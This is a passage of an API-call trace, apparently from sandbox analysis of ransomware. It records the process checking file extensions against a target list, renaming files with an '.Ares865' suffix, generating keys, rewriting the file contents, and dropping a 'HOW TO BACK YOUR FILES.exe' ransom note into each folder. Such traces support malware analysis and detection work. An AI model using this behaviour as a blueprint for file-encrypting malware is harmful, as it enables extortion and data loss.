[0088.761] lstrlenW (lpString="teacher") returned 7 [0088.761] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.761] lstrlenW (lpString="tmd") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.761] lstrlenW (lpString="tps") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.761] lstrlenW (lpString="trc") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.761] lstrlenW (lpString="trc") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.761] lstrlenW (lpString="trm") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.761] lstrlenW (lpString="udb") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.761] lstrlenW (lpString="udl") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.761] lstrlenW (lpString="usr") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.761] lstrlenW (lpString="v12") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.761] lstrlenW (lpString="vis") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.761] lstrlenW (lpString="vpd") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.761] lstrlenW (lpString="vvv") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.761] lstrlenW (lpString="wdb") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.761] lstrlenW (lpString="wmdb") returned 4 [0088.761] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.761] lstrlenW (lpString="wrk") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.761] lstrlenW (lpString="xdb") returned 3 [0088.761] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.762] lstrlenW (lpString="xld") returned 3 [0088.762] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.762] lstrlenW (lpString="xmlff") returned 5 [0088.762] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.762] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.Ares865") returned 80 [0088.762] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.763] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\XLSLICER.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\xlslicer.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.763] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=15712) returned 1 [0088.763] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.763] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.763] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.764] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.764] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.764] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.764] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4060, lpName=0x0) returned 0x15c [0088.766] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4060) returned 0x190000 [0088.770] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.770] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.771] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0088.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0088.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.771] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0088.771] CloseHandle (hObject=0x15c) returned 1 [0088.771] CloseHandle (hObject=0x118) returned 1 [0088.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.772] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfe092000, ftCreationTime.dwHighDateTime=0x1cac820, ftLastAccessTime.dwLowDateTime=0xef116910, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe092000, ftLastWriteTime.dwHighDateTime=0x1cac820, nFileSizeHigh=0x0, nFileSizeLow=0x3d60, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLSLICER.DLL.trx_dll", cAlternateFileName="XLSLIC~1.TRX")) returned 0 [0088.772] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0088.772] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79f0 [0088.772] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Network", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network") returned="C:\\Users\\All Users\\Microsoft\\Network" [0088.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed8a0 | out: hHeap=0x2b0000) returned 1 [0088.772] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79e8 | out: hHeap=0x2b0000) returned 1 [0088.772] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network") returned 36 [0088.772] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Network" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network") returned="C:\\Users\\All Users\\Microsoft\\Network" [0088.772] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0088.772] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Network\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\network\\how to back your files.exe"), bFailIfExists=1) returned 0 [0088.773] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0088.773] GetLastError () returned 0x0 [0088.773] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0088.773] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0088.773] CloseHandle (hObject=0x120) returned 1 [0088.773] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0088.773] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0088.773] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0088.773] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0088.773] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0088.773] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0088.773] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.773] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0088.774] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0088.774] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0088.774] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0088.774] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c635a60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c635a60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="aoldtz.exe") returned 1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2=".") returned 1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="..") returned 1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="windows") returned -1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="bootmgr") returned 1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="temp") returned -1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="pagefile.sys") returned -1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="boot") returned 1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="ids.txt") returned -1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="ntuser.dat") returned -1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="perflogs") returned -1 [0088.774] lstrcmpiW (lpString1="Connections", lpString2="MSBuild") returned -1 [0088.774] lstrlenW (lpString="Connections") returned 11 [0088.774] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\*") returned 38 [0088.774] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Connections" | out: lpString1="Connections") returned="Connections" [0088.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79e8 [0088.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2e4710 [0088.774] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79f0 | out: ListHead=0x2e7710, ListEntry=0x2e79f0) returned 0x2e7790 [0088.774] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloader", cAlternateFileName="DOWNLO~1")) returned 1 [0088.774] lstrcmpiW (lpString1="Downloader", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0088.774] lstrcmpiW (lpString1="Downloader", lpString2="aoldtz.exe") returned 1 [0088.774] lstrcmpiW (lpString1="Downloader", lpString2=".") returned 1 [0088.774] lstrcmpiW (lpString1="Downloader", lpString2="..") returned 1 [0088.774] lstrcmpiW (lpString1="Downloader", lpString2="windows") returned -1 [0088.774] lstrcmpiW (lpString1="Downloader", lpString2="bootmgr") returned 1 [0088.774] lstrcmpiW (lpString1="Downloader", lpString2="temp") returned -1 [0088.775] lstrcmpiW (lpString1="Downloader", lpString2="pagefile.sys") returned -1 [0088.775] lstrcmpiW (lpString1="Downloader", lpString2="boot") returned 1 [0088.775] lstrcmpiW (lpString1="Downloader", lpString2="ids.txt") returned -1 [0088.775] lstrcmpiW (lpString1="Downloader", lpString2="ntuser.dat") returned -1 [0088.775] lstrcmpiW (lpString1="Downloader", lpString2="perflogs") returned -1 [0088.775] lstrcmpiW (lpString1="Downloader", lpString2="MSBuild") returned -1 [0088.775] lstrlenW (lpString="Downloader") returned 10 [0088.775] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Connections") returned 48 [0088.775] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Downloader" | out: lpString1="Downloader") returned="Downloader" [0088.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7a08 [0088.775] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x60) returned 0x2f1fc8 [0088.775] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7a10 | out: ListHead=0x2e7710, ListEntry=0x2e7a10) returned 0x2e79f0 [0088.775] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c60f900, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0088.775] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0088.775] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c60f900, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0088.775] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0088.775] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0088.775] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Downloader", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader" [0088.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f1fc8 | out: hHeap=0x2b0000) returned 1 [0088.775] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a08 | out: hHeap=0x2b0000) returned 1 [0088.775] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned 47 [0088.775] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Network\\Downloader" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Network\\Downloader") returned="C:\\Users\\All Users\\Microsoft\\Network\\Downloader" [0088.775] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0088.775] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\network\\downloader\\how to back your files.exe"), bFailIfExists=1) returned 0 [0088.776] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0088.776] GetLastError () returned 0x0 [0088.776] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0088.776] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0088.776] CloseHandle (hObject=0x120) returned 1 [0088.776] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0088.776] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0088.776] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0088.776] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0088.776] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0088.776] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0088.776] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd9b5b52, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c60f900, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.776] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0088.776] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0088.777] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0088.777] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0088.777] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c60f900, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c60f900, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0088.777] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0088.777] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x120, ftCreationTime.dwLowDateTime=0x7606ea15, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x7606ea15, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0xe0118910, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x400000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qmgr0.dat", cAlternateFileName="")) returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="aoldtz.exe") returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2=".") returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="..") returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="windows") returned -1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="bootmgr") returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="temp") returned -1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="pagefile.sys") returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="boot") returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="ids.txt") returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="ntuser.dat") returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="perflogs") returned 1 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2="MSBuild") returned 1 [0088.777] lstrlenW (lpString="qmgr0.dat") returned 9 [0088.777] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Network\\Downloader\\*") returned 49 [0088.777] lstrcpyW (in: lpString1=0x2cce460, lpString2="qmgr0.dat" | out: lpString1="qmgr0.dat") returned="qmgr0.dat" [0088.777] lstrlenW (lpString="qmgr0.dat") returned 9 [0088.777] lstrlenW (lpString="Ares865") returned 7 [0088.777] lstrcmpiW (lpString1="gr0.dat", lpString2="Ares865") returned 1 [0088.777] lstrlenW (lpString=".dll") returned 4 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2=".dll") returned 1 [0088.777] lstrlenW (lpString=".lnk") returned 4 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2=".lnk") returned 1 [0088.777] lstrlenW (lpString=".ini") returned 4 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2=".ini") returned 1 [0088.777] lstrlenW (lpString=".sys") returned 4 [0088.777] lstrcmpiW (lpString1="qmgr0.dat", lpString2=".sys") returned 1 [0088.777] lstrlenW (lpString="qmgr0.dat") returned 9 [0088.777] lstrlenW (lpString="bak") returned 3 [0088.777] lstrcmpiW (lpString1="dat", lpString2="bak") returned 1 [0088.777] lstrlenW (lpString="ba_") returned 3 [0088.777] lstrcmpiW (lpString1="dat", lpString2="ba_") returned 1 [0088.777] lstrlenW (lpString="dbb") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="dbb") returned -1 [0088.778] lstrlenW (lpString="vmdk") returned 4 [0088.778] lstrcmpiW (lpString1=".dat", lpString2="vmdk") returned -1 [0088.778] lstrlenW (lpString="rar") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="rar") returned -1 [0088.778] lstrlenW (lpString="zip") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="zip") returned -1 [0088.778] lstrlenW (lpString="tgz") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="tgz") returned -1 [0088.778] lstrlenW (lpString="vbox") returned 4 [0088.778] lstrcmpiW (lpString1=".dat", lpString2="vbox") returned -1 [0088.778] lstrlenW (lpString="vdi") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="vdi") returned -1 [0088.778] lstrlenW (lpString="vhd") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="vhd") returned -1 [0088.778] lstrlenW (lpString="vhdx") returned 4 [0088.778] lstrcmpiW (lpString1=".dat", lpString2="vhdx") returned -1 [0088.778] lstrlenW (lpString="avhd") returned 4 [0088.778] lstrcmpiW (lpString1=".dat", lpString2="avhd") returned -1 [0088.778] lstrlenW (lpString="db") returned 2 [0088.778] lstrcmpiW (lpString1="at", lpString2="db") returned -1 [0088.778] lstrlenW (lpString="db2") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="db2") returned -1 [0088.778] lstrlenW (lpString="db3") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="db3") returned -1 [0088.778] lstrlenW (lpString="dbf") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="dbf") returned -1 [0088.778] lstrlenW (lpString="mdf") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="mdf") returned -1 [0088.778] lstrlenW (lpString="mdb") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="mdb") returned -1 [0088.778] lstrlenW (lpString="sql") returned 3 [0088.778] lstrcmpiW (lpString1="dat", lpString2="sql") returned -1 [0088.778] lstrlenW (lpString="sqlite") returned 6 [0088.778] lstrcmpiW (lpString1="r0.dat", lpString2="sqlite") returned -1 [0088.778] lstrlenW (lpString="sqlite3") returned 7 [0088.778] lstrcmpiW (lpString1="gr0.dat", lpString2="sqlite3") returned -1 [0088.778] lstrlenW (lpString="sqlitedb") returned 8 [0088.779] lstrcmpiW (lpString1="mgr0.dat", 